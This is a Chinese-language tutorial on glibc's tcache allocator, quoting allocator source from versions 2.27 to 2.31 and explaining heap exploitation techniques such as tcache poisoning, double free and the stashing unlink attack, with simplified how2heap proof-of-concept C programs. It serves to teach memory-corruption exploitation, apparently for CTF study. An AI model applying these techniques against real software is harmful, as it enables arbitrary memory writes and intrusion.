0x01 什么是tcache
tcache全名thread local caching,它为每个线程创建一个缓存(cache),从而实现无锁的分配算法,有不错的性能提升。性能提升的代价就是安全检测的减少。下面先以glibc2.27进行分析,最后再补充glibc2.29和glibc2.31的改进。
1.1数据结构
新增了两个结构体tcache_entry和tcache_perthread_struct来管理tcache。tcache_entry只包含一个变量next指向下一个tcache_entry结构。tcache_perthread_struct的counts表示对应tcache_bin的数量,tcache_entry*表示对应的tcache_bin链表。每个tcache_entry链表最多包含7个bin。
/* We overlay this structure on the user-data portion of a chunk when
the chunk is stored in the per-thread cache. */
typedef struct tcache_entry
{
struct tcache_entry *next;
} tcache_entry;
/* There is one of these for each thread, which contains the
per-thread cache (hence "tcache_perthread_struct"). Keeping
overall size low is mildly important. Note that COUNTS and ENTRIES
are redundant (we could have just counted the linked list each
time), this is for performance reasons. */
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
关于tcache的重要函数,tcache_put()和tcache_get(),用于将tcache_bin放入对应的链表中和从对应链表中取出tcache_bin。只是对tc_idx进行了最简单的是否小于TCACHE_MAX_BINS(默认是64)进行检查
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
return (void *) e;
}
tcache结构小结
- tcache结构的核心是tcache_perthread_struct记录了tcache的数量和tcache_entry链表。每次使用tcache之前会先在堆块中分配该结构体的空间。
- TCACHE_MAX_BINS的默认大小为64,有64条单链表。最小tcache为0x20,最大为0x410。malloc申请时最大可申请0x408大小的tcahce。
- 每个tcache_entry链表最多包含7个chunk。
- 如果malloc时存在对应的tcache,会优先返回tcache,用完只后才会使用fastbin
- 如果free时tcache_entry存在空位会优先填满tcache,再放入fastbin或者unsortedbin当中。
1.2 tcache的使用
通过搜索tcache_get和tcache_put函数的引用来分析,tcache什么时候会被使用。tcache_get有4处,第一个为定义,总共3个地方使用了。tcache_put有5处,第一个为定义,总共4个地方使用。
tcache_get
第1处 __libc_malloc
在 __libc_malloc中对申请大小对应的tcache chunk进行判断,如果存在对应空闲tcache chunk则直接进行分配,没有则进入_int_malloc进行分配
void *
__libc_malloc (size_t bytes)
{
mstate ar_ptr;
void *victim;
void *(*hook) (size_t, const void *)
= atomic_forced_read (__malloc_hook);
if (__builtin_expect (hook != NULL, 0))
return (*hook)(bytes, RETURN_ADDRESS (0));
#if USE_TCACHE
/* int_free also calls request2size, be careful to not pad twice. */
size_t tbytes;
checked_request2size (bytes, tbytes);
size_t tc_idx = csize2tidx (tbytes);
MAYBE_INIT_TCACHE ();
DIAG_PUSH_NEEDS_COMMENT;
//判断tc_idx是否在tcache范围内
//tcache是否存在
//tc_idx对应的链表是否存在节点
if (tc_idx < mp_.tcache_bins
/*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */
&& tcache
&& tcache->entries[tc_idx] != NULL)
{
return tcache_get (tc_idx);
}
DIAG_POP_NEEDS_COMMENT;
#endif
第2,3处 _int_malloc
在_int_malloc:3729处for循环处理unsorted bin链表时如果存在将目标大小的chunk放入tcache时会将return_cached置1,直接调用tcache_get并返回。
#if USE_TCACHE
/* If we've processed as many chunks as we're allowed while
filling the cache, return one of the cached ones. */
++tcache_unsorted_count;
if (return_cached
&& mp_.tcache_unsorted_limit > 0
&& tcache_unsorted_count > mp_.tcache_unsorted_limit)
{
return tcache_get (tc_idx);
}
#endif
#define MAX_ITERS 10000
if (++iters >= MAX_ITERS)
break;
}
#if USE_TCACHE
/* If all the small chunks we found ended up cached, return one now. */
if (return_cached)
{
return tcache_get (tc_idx);
}
#endif
tcache_puts
第一处_int_free
如果释放chunk对应的tcache存在空间,则直接将chunk放入tcache中。
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache
&& tc_idx < mp_.tcache_bins
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
#endif
在_int_malloc中存在好多处tcache_put,将fastbin和smallbin中的bin放入tcache中
第二处_int_malloc:3620:fastbin
能执行到这,说明原来的对应tcache中并没有可用bin。将第一个取到的chunk返回,并循环将fastbin中的bin放入tcache
/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = *fb) != NULL)
{
if (SINGLE_THREAD_P)
*fb = tc_victim->fd;
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
第三处_int_malloc:3677:smallbin
类似第二次。将第一个取到的chunk返回,将剩下的smallbin放入tcache
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx);
if ((victim = last (bin)) != bin)
{
bck = victim->bk;
if (__glibc_unlikely (bck->fd != victim))
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck;
bck->fd = bin;
if (av != &main_arena)
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;
/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;
tcache_put (tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
第四处_int_malloc:3794
当tcache,fastbin,smallbin中都没有需要的chunk,则会进入大的for循环处理unsortedbin。当取出的unsortedbin大小(size)和申请的大小(nb)相同时,会将chunk放入tcache中并设置return_cached置为1。
if (size == nb)//申请大小和unsorted取的大小相同时
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. *///如果是tcache先放入tcache中,再取出
if (tcache_nb
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}
0x02 tcache各种漏洞利用方式
2.1 tcache poisoning
原理:通过覆盖 tcache 中的 next,实现任意地址malloc。
下面是how2heap中tcache_poisoning.c简化版,通过修改chunk_b的next为栈地址stack_var,两次分配后得到栈地址。
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main()
{
// disable buffering
setbuf(stdin, NULL);
setbuf(stdout, NULL);
size_t stack_var;
intptr_t *a = malloc(128);
intptr_t *b = malloc(128);
free(a);
free(b);
b[0] = (intptr_t)&stack_var;//修改chunk_b的next
intptr_t *c = malloc(128);
malloc(128);//malloc分配到栈中的地址
return 0;
}
2.2 tcache dup
类似 fastbin dup。但是在tcache_put时,没有进行检查。
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
下面代码是how2heap中的tcache_dup.c,连续两次free chunk_a。之后连续申请可以申请到同一个chunk_a。
#include <stdio.h>
#include <stdlib.h>
int main()
{
int *a = malloc(8);
free(a);
free(a);//double free
void *b = malloc(8);
void *c = malloc(8);
printf("Next allocated buffers will be same: [ %p, %p ].\n", b, c);
return 0;
}
2.3 tcache perthread corruption
tcache_perthread_struct 管理 tcache 的结构,如果能控制这个结构体,就能随意控制malloc到任意地址。且一般tcache_perthread_struct结构体也是使用malloc来创建,在heap的最前面。
常见的利用思路:
1.修改counts数组,将值设为超过8,当free一个chunk时将不会再进入tcache,方便泄露libc_base
2.修改entry数组,可以达到任意地址malloc的目的
2.4 tcache house of spirit
在栈上伪造fake_chunk,free(fake_chunk)将会使fake_chunk进入tcache
2.5 smallbin unlink
当smallbin中还有其他bin时,会将剩下的bin放入tcache中,会进入上文第三处_int_malloc:3677:smallbin分支,会出现unlink操作,但是缺少了unlink检查,可以使用unlink攻击。
2.6 tcache stashing unlink attack
1.当tcache_bin中有空闲的堆块
2.small_bin中有对应的堆块
3.调用calloc(calloc函数会调用_int_malloc),不会从tcache_bin中取得bin,而是会进入上文第三处_int_malloc:3677:smallbin,将堆块放入tcache中,由于缺少了检查
4.如果可以控制small_bin中的bk为一个writeable_addr,(其中bck就是writeable_addr)则可在writeable_addr+0x10写入一个libc地址。
下面是简化版的how2heap
1.构造漏洞环境,tcache_bin中5个bin,small_bin中两个bin
2.修改chunk2->bk=stack_var,设置fake_chunk->bk,stack_var[3] = &stack_var[2]
3.calloc触发进入目标分枝,unsorted_bin按照bk进行循环,则会先取到chunk0用于返回,进入while循环将small_bin中剩余的放入tcache中,取得chunk2,再取到stack_var放入tcache中,最后一次调用bck->fd = bin会在stack_var[4]中设置libc中的地址
4.再次申请,分配到栈上的fake_chunk。
#include <stdio.h>
#include <stdlib.h>
int main(){
unsigned long stack_var[0x10] = {0};
unsigned long *chunk_lis[0x10] = {0};
unsigned long *target;
//设置fake_chunk.bk,如果不设置则bck=0,bck->fd就会报错
stack_var[3] = (unsigned long)(&stack_var[2]);
//now we malloc 9 chunks
for(int i = 0;i < 9;i++){
chunk_lis[i] = (unsigned long*)malloc(0x90);
}
//put 7 tcache
for(int i = 3;i < 9;i++){
free(chunk_lis[i]);
}
//last tcache bin
free(chunk_lis[1]);
//now they are put into unsorted bin
free(chunk_lis[0]);//chunk0
free(chunk_lis[2]);//chunk2
//convert into small bin
malloc(0xa0);//>0x90,将unsorted中bin放入tcache中
malloc(0x90);
malloc(0x90);
//构造tcache_bin中5个bin
//构造small_bin中2个bin small_bin.bk --> chunk0.bk --> chunk2.bk --> stack_var
// small_bin.fd --> chunk2.fd --> chunk0
/*VULNERABILITY*/
chunk_lis[2][1] = (unsigned long)stack_var;
/*VULNERABILITY*/
calloc(1,0x90);
//malloc and return our fake chunk on stack
target = malloc(0x90);
return 0;
}
0x03 glibc2.29的更新
3.1 结构体改变
1.tcache_entry新增key成员(tcache_perthread_struct结构体地址)用于防止double free
typedef struct tcache_entry
{
struct tcache_entry *next;
/* This field exists to detect double frees. */
struct tcache_perthread_struct *key;
} tcache_entry;
typedef struct tcache_perthread_struct
{
char counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
3.2 tcache_get和tcache_put的改变
新增的改变都是围绕key进行
1.在调用tcache_put函数时设置key成员为tcache。
2.在调用tcache_get函数时设置key成员为null。
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
assert (tc_idx < TCACHE_MAX_BINS);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
assert (tc_idx < TCACHE_MAX_BINS);
assert (tcache->entries[tc_idx] > 0);
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}
3.3 对tcache_put新增的检测
只有** _int_free**对tcache的free新增了key值检测是否等于tcache,防止double free。以后double free需要修改key值才能进行
#if USE_TCACHE
{
size_t tc_idx = csize2tidx (size);
if (tcache != NULL && tc_idx < mp_.tcache_bins)
{
/* Check to see if it's already in the tcache. */
tcache_entry *e = (tcache_entry *) chunk2mem (p);
/* This test succeeds on double free. However, we don't 100%
trust it (it also matches random payload data at a 1 in
2^<size_t> chance), so verify it's not an unlikely
coincidence before aborting. */
if (__glibc_unlikely (e->key == tcache))
{
tcache_entry *tmp;
LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
for (tmp = tcache->entries[tc_idx];
tmp;
tmp = tmp->next)
if (tmp == e)
malloc_printerr ("free(): double free detected in tcache 2");
/* If we get here, it was a coincidence. We've wasted a
few cycles, but don't abort. */
}
if (tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (p, tc_idx);
return;
}
}
}
#endif
0x04 glibc2.31的更新
4.1 结构体改变
tcache_perthread_struct结构体count数组由原来的char改成了uint16_t,结构体大小发生了改变由原来的0x240变成0x280。
typedef struct tcache_perthread_struct
{
uint16_t counts[TCACHE_MAX_BINS];
tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;
4.2 tcache_get和tcache_put改变
原本的assert检查从tcache_get和tcache_put中移除,由调用者确保函数调用的安全。
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;
e->next = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
tcache->entries[tc_idx] = e->next;
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}
0x05 总结
总体来说利用方式比之前更简单。
参考链接
ctfwiki